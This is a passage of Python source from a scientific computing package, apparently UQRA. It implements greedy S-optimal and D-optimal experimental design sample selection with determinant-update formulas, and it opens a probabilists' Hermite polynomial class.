print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples.append(i)
else:
print('NotImplementedError: UQRA.OptimalDesign.get_D_Optimality_samples: algorithm {:s} not implemented...'.format(algorithm))
raise NotImplementedError
optimal_samples = self._list_diff(optimal_samples, self.optimal_samples)
return optimal_samples
def get_S_Optimality_samples(self, n, algorithm):
"""
Optimal design with S-optimality
Arguments:
n: int, number of samples to be returned
Algorithm: str, algorithms used to initialize S-optimal samples
Algorithms reference:
<NAME>., <NAME>., <NAME>., & <NAME>. (2010). Computing multivariate Fekete and Leja points by numerical linear algebra. SIAM Journal on Numerical Analysis, 48(5), 1984-1999.
"""
if algorithm.upper() == 'GREEDY':
candidate_samples = copy.deepcopy(self.candidate_samples)
optimal_samples = copy.deepcopy(self.optimal_samples)
for _ in tqdm(range(n), ascii=True, desc=" [Greedy S]",ncols=80):
## find the next optimal index from Q which is not currently selected
candidate_samples = self._list_diff(candidate_samples, optimal_samples)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples ,:]
X_sltd = self.X[optimal_samples,:]
## calculate (log)S values for each row in X_cand together with X_sltd
optimality_values = self._greedy_update_S_Optimality_full(X_sltd, X_cand)
if len(optimality_values) != len(candidate_samples):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(candidate_samples), len(optimality_values)))
i = candidate_samples[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
## check if this index is already selected
if i in optimal_samples:
print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples.append(i)
else:
            print('NotImplementedError: UQRA.OptimalDesign.get_S_Optimality_samples: algorithm {:s} not implemented...'.format(algorithm))
raise NotImplementedError
optimal_samples = self._list_diff(optimal_samples, self.optimal_samples)
return optimal_samples
def _initial_samples_rrqr(self, n):
"""
Return rows corresponding to largest absolute singular values in design matrix X based on RRQR
Arguments:
n: set of selected indices
"""
n = helpers.check_int(n)
X = self.X[self.candidate_samples, :]
if n > min(X.shape):
raise ValueError('Can only return at most rank(X) samples')
# print(' - [Initialization (RRQR)]'.ljust(80, '#'))
_,_,Pivot = sp.linalg.qr(X.T, pivoting=True)
optimal_samples = [self.candidate_samples[i] for i in Pivot[:n]]
return optimal_samples
def _initial_samples_greedy_tsm(self, n, optimality, optimal_samples=None):
"""
return initial samples selected based with truncated square matrices
"""
n = helpers.check_int(n)
if n > min(len(self.candidate_samples), self.X.shape[1]):
raise ValueError('Can only return at most rank(X) samples')
        ## if no samples are selected currently, then the first sample is drawn randomly
        ## the remaining n-1 samples are drawn successively with the greedy algorithm
if optimal_samples is None:
optimal_samples = [np.random.randint(0, self.X.shape[0], size=1).item(),]
n = n-1
candidate_samples = copy.deepcopy(self.candidate_samples)
optimal_samples = copy.deepcopy(optimal_samples)
for _ in tqdm(range(n), ascii=True, desc=" - [Initialization (TSM)-{:s}]".format(optimality),ncols=80):
# for _ in range(n):
## find the next optimal index from Q which is not currently selected
candidate_samples = self._list_diff(candidate_samples, optimal_samples)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples ,:]
X_sltd = self.X[optimal_samples,:]
## calculate (log)S values for each row in X_cand together with X_sltd
if optimality == 'S':
optimality_values = self._greedy_update_S_Optimality_truncate(X_sltd, X_cand)
# np.savetxt('optimality_values_S{:d}.csv'.format(optimality_values.size), optimality_values, delimiter=",")
elif optimality == 'D':
optimality_values = self._greedy_update_D_Optimality_truncate(X_sltd, X_cand)
# np.savetxt('optimality_values_D{:d}.csv'.format(optimality_values.size), optimality_values, delimiter=",")
else:
                print(' > UQRA {:s}-Optimal Design initialization with TSM is NOT implemented'.format(optimality))
raise NotImplementedError
if len(optimality_values) != len(candidate_samples):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(candidate_samples), len(optimality_values)))
i = candidate_samples[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
# print(optimality_values.T, i)
## check if this index is already selected
if i in optimal_samples:
print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples.append(i)
return optimal_samples
def _greedy_update_S_Optimality_full(self, A, B):
"""
Calculate S-value with matrix determinant update formula for each row element in B
Only for overdetermined system, i.e. A.T * A is not singular, i.e. n0 > p
Arguments:
A: ndarray of shape(n0, p), selected
B: ndarray of shape(n1, p), candidate
Return:
log(S-values): S([A; r.T]), r is row in B
"""
A = np.array(A, copy=False, ndmin=2)
B = np.array(B, copy=False, ndmin=2)
if A.shape[0] < A.shape[1]:
raise ValueError('S-value updating formula only works for overdetermined system, however given {}'.format(A.shape))
if A.shape[1] != B.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
n0, p = A.shape
n1, p = B.shape
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (p, p)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
d1 = np.log(1.0 + (B.dot(AAinv) * B).sum(-1)) ## (n1,)
A_col_norm = np.linalg.norm(A, axis=0)
d2 = np.sum(np.log(A_col_norm**2 + B**2), axis=1) ## (n1)
res = d1 - d2
return np.squeeze(res)
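    # Note (added for clarity): the returned quantity is
    #   log S = log(1 + r^T (A^T A)^{-1} r) - sum_j log(||a_j||^2 + r_j^2),
    # where the first term follows from the matrix determinant lemma,
    #   det([A; r^T]^T [A; r^T]) = det(A^T A) * (1 + r^T (A^T A)^{-1} r),
    # and the second term normalizes by the updated column norms.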
def _greedy_update_D_Optimality_full(self, A, B):
"""
Only for overdetermined system, i.e. A.T * A is not singular, i.e. n0 > p
Arguments:
A: ndarray of shape(n0, p), selected
B: ndarray of shape(n1, p), candidate
Return:
log(S-values): S([A; r.T]), r is row in B
"""
A = np.array(A, copy=False, ndmin=2)
B = np.array(B, copy=False, ndmin=2)
if A.shape[0] < A.shape[1]:
            raise ValueError('D-optimality updating formula only works for overdetermined systems, but A has shape {}'.format(A.shape))
if A.shape[1] != B.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
n0, p = A.shape
n1, p = B.shape
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (p, p)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
res = 1.0 + (B.dot(AAinv) * B).sum(-1) ## (n1,)
return np.squeeze(res)
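    # Note (added for clarity): by the matrix determinant lemma,
    #   det([A; r^T]^T [A; r^T]) = det(A^T A) * (1 + r^T (A^T A)^{-1} r),
    # so ranking candidates by the returned value 1 + r^T (A^T A)^{-1} r greedily maximizes the
    # determinant gain, i.e. the D-optimality criterion.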
def _greedy_update_S_Optimality_truncate(self, X0, X1):
"""
Calculate the S-value (without determinant) of a candidate vector w.r.t selected subsets
when the current selection k < p (eqn. 3.18)
Arguments:
X0 -- selected submatrix of shape (k,p), A
X1 -- candidate matrix of shape (n-k, p), B
Return:
S value without determinant (eqn. 3.18)
"""
X0 = np.array(X0, copy=False, ndmin=2)
X1 = np.array(X1, copy=False, ndmin=2)
if X0.shape[0] > X0.shape[1]:
raise ValueError('Updating formula for S-value only works for underdetermined system')
if X0.shape[1] != X1.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
k,p = X0.shape
n_k, p = X1.shape
# start = time.time()
A = copy.copy(X0[0:k, 0:k]) ## shape (k, k)
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
R = copy.copy(X1[:, 0:k]) ## shape (n-k, k)
B = AAinv.dot(R.T) ## shape (k, n-k)
c = copy.copy(X0[0:k, k]).reshape((k,1)) ## shape(k, 1) column vector
g = AAinv.dot(A.T).dot(c) ## shape (k, 1)
gamma = X1[:,k] ## shape (n-k,)
### calculating alpha with broadcasting
### eqn: 3.14-> alpha = Alpha1 * Alpha2 * Alph3
### Alpha1 = c.T A + gamma * r.T
### Alpha2 = I - b * r.T / (1 + r.T * b)
### Alpha3 = g + gamma * b
Alpha1 = R.T * gamma ## R[:,i] * gamma[i] , shape (k, n-k)
Alpha1 = c.T.dot(A) + Alpha1.T ## shape (n-k, k), add c.T.dot(A) to each row of Alpha1.T
Alpha3 = g + B * gamma ## shape (k, n-k)
size_of_array_8gb = 1e8
multiprocessing_threshold= 100
## size of largest array is of shape (n-k, k, k)
if n_k * k * k < size_of_array_8gb:
d1 = 1.0 + (R * B.T).sum(-1) ### shape (n-k, )
Alpha2 = B.T[:,:,np.newaxis] * R[:,np.newaxis] ### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
# Alpha = [ia.dot(ib).dot(ic).item() for ia, ib, ic in zip(Alpha1[:,np.newaxis], Alpha2, Alpha3.T[:,:,np.newaxis])]
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[:,np.newaxis], Alpha2, optimize='greedy')
Alpha = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[:,:,np.newaxis], optimize='greedy')
else:
batch_size = math.floor(size_of_array_8gb/k/k) ## large memory is allocated as 8 GB
Alpha = []
# for i in tqdm(range(math.ceil(n_k/batch_size)), ascii=True, desc=' Batch (n={:d}): -'.format(batch_size),ncols=80):
for i in range(math.ceil(n_k/batch_size)):
idx_start = i*batch_size
idx_end = min((i+1) * batch_size, n_k)
R_ = R[idx_start:idx_end, :]
B_ = B[:, idx_start:idx_end]
# time0 = time.time()
d1 = 1.0 + (R_ * B_.T).sum(-1) ### shape (n-k, )
Alpha2 = B_.T[:,:,np.newaxis] * R_[:,np.newaxis]### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[idx_start:idx_end,np.newaxis], Alpha2, optimize='greedy')
Alpha_ = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[idx_start:idx_end,:,np.newaxis], optimize='greedy')
Alpha.extend(Alpha_)
Alpha = np.array(Alpha)
if Alpha.shape != (n_k,):
print(Alpha)
raise ValueError('Expecting Alpha shape to be ({},), but {} given'.format(n_k, Alpha.shape))
d1 = np.log(1.0 + (R * B.T).sum(-1)) ## shape (n-k, )
A_norms = np.linalg.norm(A, axis=0)
d2 = np.sum(np.log(A_norms**2 + R**2), axis=1) ## shape (n-k, )
d4 = np.squeeze(c.T.dot(c) + gamma**2) ## shape(n-k, )
d3 = d4 - Alpha
d4 = np.log(d4)
if np.any(d3 > 0):
## d1, d2, d4 > 0. If there exist at least one d3 > 0, set negative d3 to -inf
with np.errstate(divide='ignore', invalid='ignore'):
d3 = np.log(d3)
d3 = np.nan_to_num(d3, nan=-np.inf)
delta = d1 + d3 - d2 - d4
else:
## all d3 < 0. then take the negative of all d3 and return the smallest s value
d3 = np.log(abs(d3))
delta = -(d1 + d3 - d2 - d4)
return delta
def _greedy_update_D_Optimality_truncate(self, X0, X1):
"""
Calculate the S-value (without determinant) of a candidate vector w.r.t selected subsets
when the current selection k < p (eqn. 3.18)
Arguments:
X0 -- selected submatrix of shape (k,p), A
X1 -- candidate matrix of shape (n-k, p), B
Return:
S value without determinant (eqn. 3.18)
"""
X0 = np.array(X0, copy=False, ndmin=2)
X1 = np.array(X1, copy=False, ndmin=2)
if X0.shape[0] > X0.shape[1]:
raise ValueError('Selected matrix {}, but updating formula only works for underdetermined system'.format(X0.shape))
if X0.shape[1] != X1.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
k,p = X0.shape
n_k, p = X1.shape
# start = time.time()
A = copy.copy(X0[0:k, 0:k]) ## shape (k, k)
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
R = copy.copy(X1[:, 0:k]) ## shape (n-k, k)
B = AAinv.dot(R.T) ## shape (k, n-k)
c = copy.copy(X0[0:k, k]).reshape((k,1)) ## shape(k, 1) column vector
g = AAinv.dot(A.T).dot(c) ## shape (k, 1)
gamma = X1[:,k] ## shape (n-k,)
### calculating alpha with broadcasting
### eqn: 3.14-> alpha = Alpha1 * Alpha2 * Alph3
### Alpha1 = c.T A + gamma * r.T
### Alpha2 = I - b * r.T / (1 + r.T * b)
### Alpha3 = g + gamma * b
Alpha1 = R.T * gamma ## R[:,i] * gamma[i] , shape (k, n-k)
Alpha1 = c.T.dot(A) + Alpha1.T ## shape (n-k, k), add c.T.dot(A) to each row of Alpha1.T
Alpha3 = g + B * gamma ## shape (k, n-k)
size_of_array_8gb = 1e8
multiprocessing_threshold= 100
## size of largest array is of shape (n-k, k, k)
if n_k * k * k < size_of_array_8gb:
d1 = 1.0 + (R * B.T).sum(-1) ### shape (n-k, )
Alpha2 = B.T[:,:,np.newaxis] * R[:,np.newaxis] ### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
# Alpha = [ia.dot(ib).dot(ic).item() for ia, ib, ic in zip(Alpha1[:,np.newaxis], Alpha2, Alpha3.T[:,:,np.newaxis])]
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[:,np.newaxis], Alpha2, optimize='greedy')
Alpha = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[:,:,np.newaxis], optimize='greedy')
else:
batch_size = math.floor(size_of_array_8gb/k/k) ## large memory is allocated as 8 GB
Alpha = []
# for i in tqdm(range(math.ceil(n_k/batch_size)), ascii=True, desc=' Batch (n={:d}): -'.format(batch_size),ncols=80):
for i in range(math.ceil(n_k/batch_size)):
idx_start = i*batch_size
idx_end = min((i+1) * batch_size, n_k)
R_ = R[idx_start:idx_end, :]
B_ = B[:, idx_start:idx_end]
# time0 = time.time()
d1 = 1.0 + (R_ * B_.T).sum(-1) ### shape (n-k, )
Alpha2 = B_.T[:,:,np.newaxis] * R_[:,np.newaxis]### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[idx_start:idx_end,np.newaxis], Alpha2, optimize='greedy')
Alpha_ = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[idx_start:idx_end,:,np.newaxis], optimize='greedy')
Alpha.extend(Alpha_)
Alpha = np.array(Alpha)
if Alpha.shape != (n_k,):
print(Alpha)
raise ValueError('Expecting Alpha shape to be ({},), but {} given'.format(n_k, Alpha.shape))
d1 = np.log(1.0 + (R * B.T).sum(-1)) ## shape (n-k, )
A_norms = np.linalg.norm(A, axis=0)
d4 = np.squeeze(c.T.dot(c) + gamma**2) ## shape(n-k, )
d3 = d4 - Alpha
d4 = np.log(d4)
if np.any(d3 > 0):
## d1, d4 > 0. If there exist at least one d3 > 0, set negative d3 to -inf
with np.errstate(divide='ignore', invalid='ignore'):
d3 = np.log(d3)
d3 = np.nan_to_num(d3, nan=-np.inf)
delta = d1 + d3 - d4
else:
## all d3 < 0. then take the negative of all d3 and return the smallest s value
d3 = np.log(abs(d3))
delta = -(d1 + d3 - d4)
return delta
def _check_complement(self, A, B, U=None):
"""
check if A.union(B) = U and A.intersection(B) = 0
"""
A = set(A)
B = set(B)
U = set(np.arange(self.X.shape[0])) if U is None else set(U)
if A.union(B) != U:
raise ValueError(' Union of sets A and B are not the universe U')
if len(A.intersection(B)) != 0:
raise ValueError(' Sets A and B have common elements: {}'.format(A.intersection(B)))
return True
def _list_union(self, ls1, ls2):
"""
append ls2 to ls1 and check if there exist duplicates
return the union of two lists and remove duplicates
"""
ls_common = self._list_inter(ls1, ls2)
if len(ls_common) != 0:
print('list 1: {} '.format(ls1))
print('list 2: {} '.format(ls2))
raise ValueError('_list_union: Duplicate elements {} found in two lists'.format(ls_common))
ls = list(copy.deepcopy(ls1)) + list(copy.deepcopy(ls2))
return ls
def _list_diff(self, ls1, ls2):
"""
returns a list of elements in ls1 but not in ls2
"""
ls1 = list(copy.deepcopy(ls1))
ls2 = list(copy.deepcopy(ls2))
for element in ls2:
try:
ls1.remove(element)
except ValueError:
pass
return ls1
def _list_inter(self, ls1, ls2):
"""
return common elements between ls1 and ls2
"""
ls = list(set(ls1).intersection(set(ls2)))
return ls
### ------------------- outdated functions -----------------------
def _get_samples_svalue(self,n, candidate_samples, optimal_samples):
"""
return row indices for quasi optimal experimental design based on fast greedy initialization
Arguments:
n -- size of 'new' quasi optimal subset
X -- design matrix with candidates samples of shape (M,p)
M: number of samples, p: number of features
row_selected -- indices, ndarray of shape (N,) corresponding row selection matrix of length n
if row_selected is None, an empty list will be created first and n items will be appended
Otherwise, additional (n-m0) items (row index in design matrix X) will be appended
is_orth_col -- Boolean indicating if the basis space is orthogonal
Returns:
row selection matrix row_selected of shape (n, M)
"""
candidate_samples = copy.deepcopy(candidate_samples)
optimal_samples = copy.deepcopy(optimal_samples)
optimal_samples_ = [] ## new samples to be added in this step
for _ in tqdm(range(n), ascii=True, desc=" - [S-values]",ncols=80):
# for _ in range(n):
## find the next optimal index from Q which is not currently selected
optimal_samples_all= self._list_union(optimal_samples, optimal_samples_)
candidate_samples_ = self._list_diff(candidate_samples, optimal_samples_)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples_ ,:]
X_sltd = self.X[optimal_samples_all,:]
## calculate (log)S values for each row in X_cand together with X_sltd
optimality_values = self._cal_svalue(X_cand,X_sltd)
if len(optimality_values) != len(candidate_samples_):
raise ValueError('Expecting {:d} D-Optimality values, but {:d} given'.format(len(candidate_samples_), len(optimality_values)))
i = candidate_samples_[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
## check if this index is already selected
if i in optimal_samples_all:
print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples_.append(i)
return optimal_samples_
def _remove_rows_from_matrix(self, A, rows):
"""
remove rows from matrix A
Arguments:
A: ndarray of shape(m,n)
rows: row index to be removed, len=k
Return:
matrix of shape(m-k,n)
"""
A = np.array(A, copy=False, ndmin=2)
A = A[list(set(np.arange(A.shape[0])).difference(set(rows))), :]
return A
def _argmax_svalues_greedy(self, optimal_samples, Q):
"""
find the next quasi optimal sample
Arguments:
optimal_samples -- list containing selected row indices from original design matrix Q
Q -- QR factorization of candidate design matrix X if basis is not orthogonal, otherwise is X
Return:
i -- integer, index with maximum svalue
"""
## Find the index candidate set to chose from (remove those in optimal_samples from all (0-M))
## if optimal_samples is empty, choose one randomly
row_candidate = list(set(range(Q.shape[0])).difference(set(optimal_samples)))
## split original design matrix Q into candidate matrix Q_cand, and selected Q_sltd
Q_cand = Q[np.array(row_candidate, dtype=np.int32),:]
Q_sltd = Q[np.array(optimal_samples , dtype=np.int32),:]
## calculate (log)S values for each row in Q_cand together with Q_sltd
optimality_values = self._cal_svalue(Q_cand,Q_sltd)
if len(optimality_values) != len(row_candidate):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(row_candidate), len(optimality_values)))
i = row_candidate[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
return i
def adaptive(self,X,n_samples, selected_col=[]):
"""
        Coherence Compressive D-optimality
Xb = Y
X: Design matrix X(u) of shape(num_samples, num_features)
S: selected columns
K: sparsity
Return:
Experiment samples of shape(ndim, n_samples)
"""
selected_col = selected_col if selected_col else range(X.shape[1])
if self.selected_rows is None:
X_selected = X[:,selected_col]
selected_rows = self.samples(X_selected, n_samples=n_samples)
self.selected_rows = selected_rows
return selected_rows
else:
X_selected = X[self.selected_rows,:][:,selected_col]
X_candidate= X[:, selected_col]
### X_selected.T * B = X_candidate.T -> solve for B
X_curr_inv = np.dot(np.linalg.inv(np.dot(X_selected, X_selected.T)), X_selected)
B = np.dot(X_curr_inv, X_candidate.T)
X_residual = X_candidate.T - np.dot(X_selected.T, B)
Q, R, P = sp.linalg.qr(X_residual, pivoting=True)
selected_rows = np.concatenate((self.selected_rows, P))
_, i = np.unique(selected_rows, return_index=True)
selected_rows = selected_rows[np.sort(i)]
selected_rows = selected_rows[:len(self.selected_rows) + n_samples]
self.selected_rows = selected_rows
return selected_rows[len(self.selected_rows):]
def _cal_svalue_under(self, X0, X1):
"""
Calculate the S-value (without determinant) of a candidate vector w.r.t selected subsets
when the current selection k < p (eqn. 3.18)
Arguments:
X0 -- candidate matrix of shape (n-k, p),
X1 -- selected submatrix of shape (k,p)
Return:
S value without determinant (eqn. 3.18)
"""
n_k, p = X0.shape
k,p = X1.shape
# start = time.time()
A = copy.copy(X1[0:k, 0:k]) ## shape (k, k)
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
R = copy.copy(X0[:, 0:k]) ## shape (n-k, k)
B = AAinv.dot(R.T) ## shape (k, n-k)
c = copy.copy(X1[0:k, k]).reshape((k,1)) ## shape(k, 1) column vector
g = AAinv.dot(A.T).dot(c) ## shape (k, 1)
gamma = X0[:,k] ## shape (n-k,)
### calculating alpha with broadcasting
### eqn: 3.14-> alpha = Alpha1 * Alpha2 * Alph3
### Alpha1 = c.T A + gamma * r.T
### Alpha2 = I - b * r.T / (1 + r.T * b)
### Alpha3 = g + gamma * b
Alpha1 = R.T * gamma ## R[:,i] * gamma[i] , shape (k, n-k)
Alpha1 = c.T.dot(A) + Alpha1.T ## shape (n-k, k), add c.T.dot(A) to each row of Alpha1.T
Alpha3 = g + B * gamma ## shape (k, n-k)
size_of_array_8gb = 1e8
multiprocessing_threshold= 100
## size of largest array is of shape (n-k, k, k)
if n_k * k * k < size_of_array_8gb:
d1 = 1.0 + (R * B.T).sum(-1) ### shape (n-k, )
Alpha2 = B.T[:,:,np.newaxis] * R[:,np.newaxis] ### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
# Alpha = [ia.dot(ib).dot(ic).item() for ia, ib, ic in zip(Alpha1[:,np.newaxis], Alpha2, Alpha3.T[:,:,np.newaxis])]
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[:,np.newaxis], Alpha2, optimize='greedy')
Alpha = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[:,:,np.newaxis], optimize='greedy')
else:
batch_size = math.floor(size_of_array_8gb/k/k) ## large memory is allocated as 8 GB
Alpha = []
# for i in tqdm(range(math.ceil(n_k/batch_size)), ascii=True, desc=' Batch (n={:d}): -'.format(batch_size),ncols=80):
for i in range(math.ceil(n_k/batch_size)):
idx_start = i*batch_size
idx_end = min((i+1) * batch_size, n_k)
R_ = R[idx_start:idx_end, :]
B_ = B[:, idx_start:idx_end]
# time0 = time.time()
d1 = 1.0 + (R_ * B_.T).sum(-1) ### shape (n-k, )
Alpha2 = B_.T[:,:,np.newaxis] * R_[:,np.newaxis]### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[idx_start:idx_end,np.newaxis], Alpha2, optimize='greedy')
Alpha_ = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[idx_start:idx_end,:,np.newaxis], optimize='greedy')
Alpha.extend(Alpha_)
Alpha = np.array(Alpha)
if Alpha.shape != (n_k,):
print(Alpha)
raise ValueError('Expecting Alpha shape to be ({},), but {} given'.format(n_k, Alpha.shape))
d1 = np.log(1.0 + (R * B.T).sum(-1)) ## shape (n-k, )
A_norms = np.linalg.norm(A, axis=0)
d2 = np.sum(np.log(A_norms**2 + R**2), axis=1) ## shape (n-k, )
d4 = np.squeeze(c.T.dot(c) + gamma**2) ## shape(n-k, )
d3 = d4 - Alpha
d4 = np.log(d4)
if np.any(d3 > 0):
## d1, d2, d4 > 0. If there exist at least one d3 > 0, set negative d3 to -inf
with np.errstate(divide='ignore'):
d3 = np.log(d3)
d3 = np.nan_to_num(d3, nan=-np.inf)
delta = d1 + d3 - d2 - d4
else:
## all d3 < 0. then take the negative of all d3 and return the smallest s value
d3 = np.log(abs(d3))
delta = -(d1 + d3 - d2 - d4)
return delta
def _cal_svalue_over(self, X0, X1):
"""
Calculate the log(S) value (without determinant) of candidate vectors w.r.t selected subsets
when the current selection k >= p (eqn. 3.16) for each pair of (X[i,:], X1)
Arguments:
X0 -- candidate matrix of shape (n-k, p),
X1 -- selected subsets matrix of shape (k,p)
Return:
S value without determinant (eqn. 3.16)
"""
try:
AAinv = np.linalg.inv(X1.T.dot(X1)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(X1.T.dot(X1))
print('singular value of A.T *A: {}'.format(s))
X1_norms = np.linalg.norm(X1, axis=0) ## (p,)
d1 = np.log(1.0 + (X0.dot(AAinv) * X0).sum(-1)) ## (n-k,)
d2 = np.sum(np.log(X1_norms**2 + X0**2), axis=1) ## (n-k,)
optimality_values = d1 - d2
return np.squeeze(optimality_values)
# def _cal_svalue_over(self, X0, X1):
# """
# Calculate the S value (without determinant) of candidate vectors w.r.t selected subsets
# when the current selection k >= p (eqn. 3.16) for each pair of (X[i,:], X1)
# Arguments:
# X0 -- candidate matrix of shape (number of candidates, p),
# X1 -- selected subsets matrix of shape (k,p)
# Return:
# log S value without determinant (eqn. 3.16)
# """
# XXinv = np.linalg.inv(np.dot(X1.T,X1))
# start = time.time()
# A_l2 = np.linalg.norm(X1, axis=0).reshape(1,-1) ## l2 norm for each column in X1, row vector
# svalues_log = []
# for r in X0:
# r = r.reshape(1,-1) ## row vector
# with np.errstate(invalid='ignore'):
# d1 = np.log(1 + np.dot(r, np.dot(XXinv, r.T)))
# d2 = np.log(np.prod(A_l2**2 + r**2))
# svalues_log.append(d1 - d2)
# end = time.time()
# print('for loop time elapse : {}'.format(end-start))
# # print(np.around(np.exp(svalues_log), 2))
# start = time.time()
# X1_norms = np.linalg.norm(X1, axis=0)
# # d1 = 1.0 + np.diagonal(X0.dot(XXinv).dot(X0.T))
# d1 = 1.0 + (X0.dot(XXinv) * X0).sum(-1)
# d2 = np.prod(X1_norms**2 + X0**2, axis=1)
# delta = d1/d2
# end = time.time()
# # print(np.around(delta, 2))
# print('matrix time elapse : {}'.format(end-start))
# return svalues_log
# def _cal_svalue_under(self, X0, X1):
# """
# Calculate the log S-value (without determinant) of a candidate vector w.r.t selected subsets
# when the current selection k < p (eqn. 3.18)
# Arguments:
# X0 -- candidate matrix of shape (number of candidates, p),
# X1 -- selected subsets matrix of shape (k,p)
# Return:
# log S value without determinant (eqn. 3.18)
# """
# k,p = X1.shape
# assert k < p
# X1 = copy.copy(X1[:,0:k])
# X0 = copy.copy(X0[:,0:k+1])
# svalues_log = []
# XXinv = np.linalg.inv(np.dot(X1.T,X1))
# A_l2 = np.linalg.norm(X1, axis=0).reshape(1,-1)
# for r in X0:
# c = r[0:k].reshape((k,1)) ## column vector
# gamma = r[k]
# r = copy.copy(c)
# b = np.dot(XXinv,r)
# g = np.dot(XXinv,np.dot(X1.T,c))
# a1 = np.dot(c.T,X1) + gamma * r.T
# a2 = np.identity(k) - np.dot(b,r.T)/(1 + np.dot(r.T,b))
# a3 = g + gamma *b
# a = np.squeeze(np.dot(a1,np.dot(a2,a3)))
# with np.errstate(invalid='ignore'):
# d1 = np.log(np.squeeze(1 + np.dot(r.T, b)))
# d2 = np.sum(np.log(A_l2**2 + r.T**2))
# d3 = np.log(np.squeeze(np.dot(c.T,c) + gamma**2 - a))
# d4 = np.log(np.squeeze(np.dot(c.T,c) + gamma**2))
# svalues_log.append(d1 + d3 - d2 - d4)
# return svalues_log
```
#### File: uqra/polynomial/hermite.py
```python
import numpy as np
import itertools, math
from ._polybase import PolyBase
from . import polyutils as pu
import scipy.stats as stats
class Hermite(PolyBase):
"""
Probabilists Hermite polynomial
    Orthogonality:
    probabilists: \int Hm(x) Hn(x) exp(-x^2/2) dx = sqrt(2*pi) n! delta_{mn}
    physicists  : \int Hm(x) Hn(x) exp(-x^2  ) dx = sqrt(pi) 2**n n! delta_{mn}
"""
def __init__(self, d=None, deg=None, coef=None, domain=None, window=None, multi_index='total', hem_type='probabilists'):
self.multi_index = multi_index
self.ndim = pu.check_int(d)
self.deg = pu.check_int(deg)
self.hem_type = hem_type.lower()
self.name = 'Hermite_e' if hem_type.startswith('prob') else 'Hermite'
self.nickname = 'Heme' if hem_type.startswith('prob') else 'Hem'
self.dist_name = 'norm'
